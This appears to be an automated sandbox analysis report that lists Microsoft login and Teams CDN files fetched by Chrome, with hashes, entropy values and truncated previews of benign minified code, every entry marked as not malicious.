                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css
                                                                                                                                                                                                                                                                            Preview:/*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any person
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64829)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):64942
                                                                                                                                                                                                                                                                            Entropy (8bit):5.251686466766309
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:XuElkepD3LjUBjJROoqYI3SuvCO8Gu+JtQNbm7hkJv15cT1m0GV19xl4jLvfcxRe:eEf12iJtIfmkWcJot
                                                                                                                                                                                                                                                                            MD5:1A9B20A2C01784F276690F140DFEEC0D
                                                                                                                                                                                                                                                                            SHA1:A9FED7F5A57274168378968C4C2305B8ED05F297
                                                                                                                                                                                                                                                                            SHA-256:4CFAE4971A8093EE1024E95DEE5C7CD155AD1E9B2C5F2ED64896E209FAEC7B9B
                                                                                                                                                                                                                                                                            SHA-512:AF1828580267AAC6C3D31B9322ED883B6A0F0AB1754281C07DD0273D640A9F2D90D5D6DF54217F93C5F76F0C552BD401A650893CB44E6C623953361223FE9031
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[838201],{80134:(e,t,n)=>{n.r(t),n.d(t,{GlobalAuthService:()=>fe});var i=n(161024),a=n(417694),r=n(775251),s=n(935008),o=n(406138),c=n(802756),u=n(848020),d=n(332752),l=n(510139),h=n(211713),g=n(847431),_=n(366603),T=n(193021),A=n(553882),p=n(407404),v=n(955262),m=n(923226),b=n(191914),S=n(724801),f=n(34655),w=n(348532),I=n(565439),y=n(901456),k=n(188468),U=n(879462),R=n(319095),C=n(348773),E=n(103757),D=n(355515),M=n(734025),W=n(805809),N=n(900301);const $=(e,t,n,i,a,r,s,o,c)=>{let u=n?{"content-type":"application/json","x-ms-client-capabilities":"x-ms-mto-enabled"}:{"content-type":"application/json"};const d={"X-TS-UseCache":"false"};o&&(u={...u,...c?d:{}});const l={url:`${i}?invalidate=${+new Date(Date.now())}`,method:a,headers:u,apiName:r,authOptions:{accountId:e,source:"tenants-service-endpoints"},correlationId:t};return s&&(l.body=s),l},q=e=>{const{authenticationResource
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31824)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):31932
                                                                                                                                                                                                                                                                            Entropy (8bit):5.402534530907136
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:YAFc8qHGsxF3tPtO8ZD6C8pdM3TFDBb8TcGa31tYb+t0CHkff3BZCNP3HV6gWX5S:Zw3prFtaTRCgCNP3HV6U
                                                                                                                                                                                                                                                                            MD5:797315EF7EA16ABA689C9633F59ED25A
                                                                                                                                                                                                                                                                            SHA1:CD4F1F27DE7D1DFA86F13FD03D04260FED73D963
                                                                                                                                                                                                                                                                            SHA-256:BD244032A51946A48E662BE13A03BDF0413AD98D6CC7F897EE912F66EA12C4FE
                                                                                                                                                                                                                                                                            SHA-512:6A7C5C39F89D9BA4F6BEFF77AD187A979ABE30262AD21CB0AF2012F4ED2222443598A998A59688CAE93A66E75420C425E74720A86C1F589C4F8D7FF8AEAA36C8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/526413-8a95c600f1d95ec1.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[526413,631106],{609949:(e,t,l)=>{l.d(t,{L1:()=>m});var a,o=l(277362),i=l(305536);!function(e){e[e.PngAndHtmlCopied=0]="PngAndHtmlCopied",e[e.HtmlCopied=1]="HtmlCopied"}(a||(a={}));const n=new Map;async function r(e,t,l){const o=e.document,r=new Promise((async(l,a)=>{try{let o=await t;const i=new URL(o.src);if(!(e.location.origin===i.origin||"data:"===i.protocol))try{o=await c(e,o.src)}catch(e){a(new Error(`copyImageElementToClipboard: error on same-origin image load "${e.message}"`))}o.complete?l(o):s(o,(()=>{l(o)}),(e=>{a(new Error(`copyImageElementToClipboard: error on image load "${e.message}"`))}))}catch(e){a(e)}})),d=new Promise((async(e,t)=>{try{const l=await r,a=o.createElement("canvas");a.width=l.naturalWidth,a.height=l.naturalHeight;const i=a.getContext("2d");i?(i.drawImage(l,0,0),e(a)):t(new Error("copyImageElementToClipboard: failed to get canvas 2d context."))}cat
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (45648)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):45756
                                                                                                                                                                                                                                                                            Entropy (8bit):5.285670568343104
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:cYSBClBRobRhWiH6Ue2zWDm29skdvjWtqag:sBcotT/3Gl9sk9j19
                                                                                                                                                                                                                                                                            MD5:1E0C3820F7F9CA5DFEB57B79A2BF546C
                                                                                                                                                                                                                                                                            SHA1:B43E52EEBD09198CB3CF734528580BCBCD0FA9B5
                                                                                                                                                                                                                                                                            SHA-256:C6D69D99425F6373ACB67DA85FDA3B2060DBFF69A46BDE7587129C1C7FAAF2E3
                                                                                                                                                                                                                                                                            SHA-512:F907D8A1261CACA31B1D81653360C52BB4CDFED9A7DF550D12C59B4EF1F0A491DDD57ACD348B1D99F64D5270D2B218467D854F888BA04B0D8FAB239674B53B9A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/320494-2b2c2ed38e54aa75.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[320494],{320494:(e,t,n)=>{n.d(t,{ms:()=>Ge,Hu:()=>Qe,ik:()=>Ue});var o=n(150321),r=n(89968),i=n(29213),a=n.n(i),s=n(200727),l=n.n(s),u=n(61997),c=n.n(u),d=n(445299),p=n.n(d),f=n(883343),h=n.n(f),g=n(112882),m=n.n(g),v=n(109161),y=n.n(v),I=n(565316),b=n.n(I),w=n(189544),C=n.n(w),S=n(848870),x=n.n(S),P=n(37838),k=n.n(P),O=n(26084),A=n.n(O),E=n(996665),D=n(301078),T=n(152450),R=n(121121),_=n(799323),H=n(31828),K=n(182812),M=n(338400),N=n(900046),B=n(992758),V=n(936666),L=n(953543),j=n(182227),F=n(513432),Q=n(62600),U=n.n(Q),G=n(395225),J=n.n(G),W=n(770246),z=n(786244),Z=n(90278),q=(n(164391),0);function X(e){return"function"==typeof e?e:$}function $(){}function Y(e,t){null!==e&&(0,W.A)(e,{boundary:t,block:"nearest",scrollMode:"if-needed"}).forEach((function(e){var t=e.el,n=e.top,o=e.left;t.scrollTop=n,t.scrollLeft=o}))}function ee(e,t){return e===t||e.contains&&e.contains(t)}fun
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3666)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3774
                                                                                                                                                                                                                                                                            Entropy (8bit):5.548756589394929
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:HGRm7M6x8TOsdyjLi+i2+iX334q269Q3WOpTiW03f:HGRm7M6mTOLi3WNQ3VixP
                                                                                                                                                                                                                                                                            MD5:67B134A86A1BED63678A879F6C3B59A0
                                                                                                                                                                                                                                                                            SHA1:6B8D7926C3D55680EAE35CA01B79852F46378890
                                                                                                                                                                                                                                                                            SHA-256:FF6874070AE590ED1317FE686388DD599E44B646715E3B6A9621C388490C28A5
                                                                                                                                                                                                                                                                            SHA-512:82FAB2F7E52337E653466F1BF3DC1D5A9A802AAE9CA83D21224F9F01A8BA11441262CE413A86FCD946EBC0D68F8405AB0947FB778EB42269D5FE67057125CC77
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/699899-331504c4218b8be3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[699899],{699899:(e,t,n)=>{n.d(t,{BM:()=>N,Ps:()=>T,kJ:()=>I});var r=n(189687),i=n(425104);n(296920),n(132786);const a=e=>e%4==0&&e%100!=0||e%400==0,s=e=>/^([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e),o=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01]))$/.test(e))return!1;const t=Number(e.substr(0,4)),n=Number(e.substr(5,2)),r=Number(e.substr(8,2));switch(n){case 2:return!(a(t)&&r>29)&&!(!a(t)&&r>28);case 4:case 6:case 9:case 11:if(r>30)return!1}return!0},c=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])T([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]|60))(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e))return!1;const t=Date.parse(e);if(t!=t)return!1;const n=e.indexOf("T"),r=e.substr(0,n),i=e.substr(n+1);return o(r)&&s(i)},u=e=>{const t=e.getTime();return t==t},p=e=>new Date(e),l={n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2415)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2523
                                                                                                                                                                                                                                                                            Entropy (8bit):4.936941985388673
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3D3Z90ikSrl6iyfVCbbdm0i8CjQ6W60bvxamg:+ibrl5ytedg8KE60G
                                                                                                                                                                                                                                                                            MD5:A46DE267E5DDDBCFEDEB8F09EBCA224E
                                                                                                                                                                                                                                                                            SHA1:7CB86C8DBD48BCB3EADF6345571638F603AA83F0
                                                                                                                                                                                                                                                                            SHA-256:4FA2C10DC524A8BE22772F88CF2A4A6E1C9F4E88F67AFF5E2AB220167B842CE7
                                                                                                                                                                                                                                                                            SHA-512:488727A3601F6AA285AD548E411D315F957CFBBC671A4C7F179FB0DE57B0DBC65E0AC91BCBBE55DBFBFAD8C2672202A6F2A5734AA841E9B7BACE671DBB31FF14
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/273198-072882987da06b97.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[273198],{273198:(e,C,t)=>{t.d(C,{C:()=>r});var a=t(513432),l=t(395225),n=t.n(l),c=t(485529),s=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:n()(s.Q.outline,C.outlinePart)},a.createElement("path",{d:"M7 11C7.55228 11 8 10.5523 8 10C8 9.44771 7.55228 9 7 9C6.44772 9 6 9.44771 6 10C6 10.5523 6.44772 11 7 11Z"}),a.createElement("path",{d:"M8 13C8 13.5523 7.55228 14 7 14C6.44772 14 6 13.5523 6 13C6 12.4477 6.44772 12 7 12C7.55228 12 8 12.4477 8 13Z"}),a.createElement("path",{d:"M10 11C10.5523 11 11 10.5523 11 10C11 9.44771 10.5523 9 10 9C9.44771 9 9 9.44771 9 10C9 10.5523 9.44771 11 10 11Z"}),a.createElement("path",{d:"M11 13C11 13.5523 10.5523 14 10 14C9.44771 14 9 13.5523 9 13C9 12.4477 9.44771 12 10 12C10.5523 12 11 12.4477 11 13Z"}),a.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (7979)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):8086
                                                                                                                                                                                                                                                                            Entropy (8bit):4.542394330601067
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:kxpPTqixUsv1FEouEwUFNbgF3sTnF4m4/rbgI8DT1DdhWMJT:kvTL/7fbgxunF4m4Dbgn13JT
                                                                                                                                                                                                                                                                            MD5:BCD0E506BC6CECA01C797848A1E18B4D
                                                                                                                                                                                                                                                                            SHA1:83C4C588CC01313141E40BAB05D3D5053CA55DEA
                                                                                                                                                                                                                                                                            SHA-256:0847EE837BA3D9F99BC54F557E11FC4A1BCDEB998F68AD2A5875BC25C567B45D
                                                                                                                                                                                                                                                                            SHA-512:8BBB26B17FC40CA917EF87302C0F7B0E616A8BD67F5F49085CBA52E256335B2C29311432CF28F9BDF17D4741D729D0E10E45A12A46B7A3D7ED226A5D12E63E27
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/49749-fa07bf3bd120c3c7.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[49749],{49749:(a,l,c)=>{c.d(l,{va_:()=>Z,i00:()=>e,aYy:()=>v,S61:()=>m,yDM:()=>L,nU0:()=>M,iAS:()=>H,p4K:()=>t,LMj:()=>u,Jtj:()=>i,OEF:()=>V,csZ:()=>s,OL4:()=>D,I0J:()=>U,KDM:()=>r,K4O:()=>A,APn:()=>n,VyF:()=>g,x7t:()=>R,IuD:()=>o});var h=c(693935);const Z=(0,h.U)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),e=(0,h.U)("Delete20Filled","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM9 8a.5.5 0 0 0-1 0v6a.5.5 0 0 0 1 0V8Zm2.5-.5a.5.5 0 0 0-.5.5v6a.5.5 0
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12062)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):12170
                                                                                                                                                                                                                                                                            Entropy (8bit):4.380307764986876
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:DHGR8OnPEQWNcYclUcjczclkcxcUjclSR7RQeAVqdGVfEG6NBG4n5Gd1tpX7c3bs:KRLP5WNcYclUcjczclkcxcUjcla1TAVB
                                                                                                                                                                                                                                                                            MD5:8F2536274F18C13DD264B43873DE09D7
                                                                                                                                                                                                                                                                            SHA1:C75A1D5C8CB380D9B159B8B6CAF293E4DDBF6984
                                                                                                                                                                                                                                                                            SHA-256:F65F3F02448663AD1231393CF1F247533C94552F293390EFE728570506F18260
                                                                                                                                                                                                                                                                            SHA-512:BEB447132570DAB5DEDA1E6669A70EB1BB2B9762ABA2DDA7E2BAD3C348EA77FEA94E5CBCC61702F85D7BD2964A0708BC7EEA95ECD6D269828AB551D3480D09E3
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/317907-347839a259769f33.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[317907],{317907:(a,c,h)=>{h.d(c,{wfg:()=>Z,QO3:()=>l,bdx:()=>m,nWK:()=>e,PFC:()=>H,EbJ:()=>M,Gyp:()=>V,iUz:()=>r,aYP:()=>C,EVt:()=>U,YVP:()=>g,MU$:()=>i,KyY:()=>u,tBH:()=>A,yq:()=>d,aom:()=>t,spT:()=>n,FwE:()=>s,hin:()=>R,ptg:()=>F,Y4e:()=>f,Y8w:()=>L});var v=h(693935);const Z=(0,v.U)("FullScreenMaximize20Regular","20",["M3 5c0-1.1.9-2 2-2h2a.5.5 0 0 1 0 1H5a1 1 0 0 0-1 1v2a.5.5 0 0 1-1 0V5Zm9.5-1.5c0-.28.22-.5.5-.5h2a2 2 0 0 1 2 2v2a.5.5 0 0 1-1 0V5a1 1 0 0 0-1-1h-2a.5.5 0 0 1-.5-.5Zm-9 9c.28 0 .5.22.5.5v2a1 1 0 0 0 1 1h2a.5.5 0 0 1 0 1H5a2 2 0 0 1-2-2v-2c0-.28.22-.5.5-.5Zm13 0c.28 0 .5.22.5.5v2a2 2 0 0 1-2 2h-2a.5.5 0 0 1 0-1h2a1 1 0 0 0 1-1v-2c0-.28.22-.5.5-.5Z"]),l=(0,v.U)("FullScreenMinimize20Regular","20",["M14 5a1 1 0 0 0 1 1h2a.5.5 0 0 1 0 1h-2a2 2 0 0 1-2-2V3a.5.5 0 0 1 1 0v2ZM6 15a1 1 0 0 0-1-1H3a.5.5 0 0 1 0-1h2a2 2 0 0 1 2 2v2a.5.5 0 0 1-1 0v-2Zm8 0a1 1 0 0 1 1-1h
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3651
                                                                                                                                                                                                                                                                            Entropy (8bit):4.094801914706141
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                                                                                                                                                                                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                                                                                                                                                                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                                                                                                                                                                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                                                                                                                                                                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47805)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):47913
                                                                                                                                                                                                                                                                            Entropy (8bit):5.382366921986537
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:SUpJLd/iN3A5JewIE2c4mF4CJKtD50g+SaranNE3DjeKH1b:ZLdmKpIEtr9gqranu3DqKH1b
                                                                                                                                                                                                                                                                            MD5:334DDD74DD7F780C7829E4EAC83CDFF6
                                                                                                                                                                                                                                                                            SHA1:0993A41A48093AFCB5F82C25F43AE6A7279EC815
                                                                                                                                                                                                                                                                            SHA-256:7742AE0803C92EEEDCA7F31AE73A7CAF0D53AEE1A5553FCF633414B1D1AE22CE
                                                                                                                                                                                                                                                                            SHA-512:8D863E8319BD9B583C767104A8DD88B846D0B8D01892C7D3DBC3CA7FBBB5BF026F17CBB83767FBD4B183AE555C74B3F141C86519AF9B2AAB3A9ED1FB45E6D0C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/192699-192c894d6acbddef.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[192699],{504405:(e,t,n)=>{n.d(t,{P:()=>r,C:()=>o});var r="data-is-focusable",o="data-disable-click-on-enter"},888846:(e,t,n)=>{n.d(t,{l:()=>r,E:()=>o});var r=function(e){return e[e.none=0]="none",e[e.all=1]="all",e[e.inputOnly=2]="inputOnly",e}({}),o=function(e){return e[e.vertical=0]="vertical",e[e.horizontal=1]="horizontal",e[e.bidirectional=2]="bidirectional",e[e.bidirectionalDomOrder=3]="bidirectionalDomOrder",e}({})},953543:(e,t,n)=>{n.d(t,{kR:()=>f,ZG:()=>c,QC:()=>i,rC:()=>s});var r={3:"Cancel",6:"Help",8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",28:"Convert",29:"NonConvert",30:"Accept",31:"ModeChange",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",41:"Select",42:"Print",43:"Execute",44:"PrintScreen",45:"Insert",46:"Delete",48:["0",")"],4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):79979
                                                                                                                                                                                                                                                                            Entropy (8bit):5.325944634609262
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:+Zm8MUUxRA9XGgvSrL43eCn6964I2H1g7/FJqU:+Zm8MGeSP4I2HG7/FJ5
                                                                                                                                                                                                                                                                            MD5:0909459D3BE9EACEA67C6631837AFB4F
                                                                                                                                                                                                                                                                            SHA1:A832586C4C1CBB2D1C5711599A25E092E6E4AE31
                                                                                                                                                                                                                                                                            SHA-256:C4315BE83C86083459298EEC9F198176CEB64EF841B2E95EEC8D3C2842F729DF
                                                                                                                                                                                                                                                                            SHA-512:5611037E17EECA02224BDF90D1148E3B88287F15FCE7E3CF3BD5B6908BC33C856F11F17F4A1CF83FD3C590305C3011C80362981D5DAD292821CE810C7A4D63C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/812302-f220939f159b2a8a.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[812302],{863344:(t,e,n)=>{"use strict";n.d(e,{N:()=>s,ZP:()=>u,KB:()=>a});var r=n(795800),i={},o={};function a(t,e){var n=c(t,e);return i[n]}function s(t,e,r,a){var s=c(e,a),u=i[s];if(u&&!r)return Promise.resolve(u);var l=o[s];if(l&&!r)return l;if(!t)return Promise.reject("Missing bootstrapper config");var d=n.e(336689).then(n.bind(n,538774)).then((function(e){return e.initialize(t).then((function(t){return i[s]=t,t}))}));return o[s]=d,d}function u(t,e){var n=c(t,e);delete i[n],delete o[n]}function c(t,e){var n;return[(0,r.Et)(t),null===(n=null==e?void 0:e.getCacheKeySuffix)||void 0===n?void 0:n.call(e)].join("_")}},795800:(t,e,n)=>{"use strict";function r(t,e){var n=e||{};return[t,n.userAadObjectId,n.tenantAadObjectId].join("-")}function i(t){return r("Cortex.TopicsCapabilities",t)}function o(t){return r("Cortex.TopicsSdks",t)}n.d(e,{et:()=>r,MP:()=>i,Et:()=>o})},897604:(t,e,n)=>{"use st
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46591)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):142367
                                                                                                                                                                                                                                                                            Entropy (8bit):5.430597817875451
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:PyeDWgSr6fTPRUbx3XCg/MJA5NOii5WLeVdgWLDY2Js0VgtWyTJmxyAXP3onrGGK:IgD1g/Mq5L9EveUynbBwsIccp
                                                                                                                                                                                                                                                                            MD5:CCAA31FD031C4C856EB7B986FD9F447B
                                                                                                                                                                                                                                                                            SHA1:0A809EABCDB95FA04DE5F8409B3BC994ED65CBD1
                                                                                                                                                                                                                                                                            SHA-256:3D40B4129B8B4C284908636AE46D72EA053F286FB5FE45DB78351B5B2CFC1EB9
                                                                                                                                                                                                                                                                            SHA-512:4B5B2271DB5F640FEBF13A7C0BDBD630C73530000F1593046D090585D1752E239D894614E23E801BE4C6A379406B6EF521423FA27C3865C3CD4ABB0A64823780
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):75662
                                                                                                                                                                                                                                                                            Entropy (8bit):5.462624435812403
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:dIgGLV8OiyPwDCT+frbqKHDxrogYheDtiLDS/bz1u:dLhOuy+fvqKHDJFtiqu
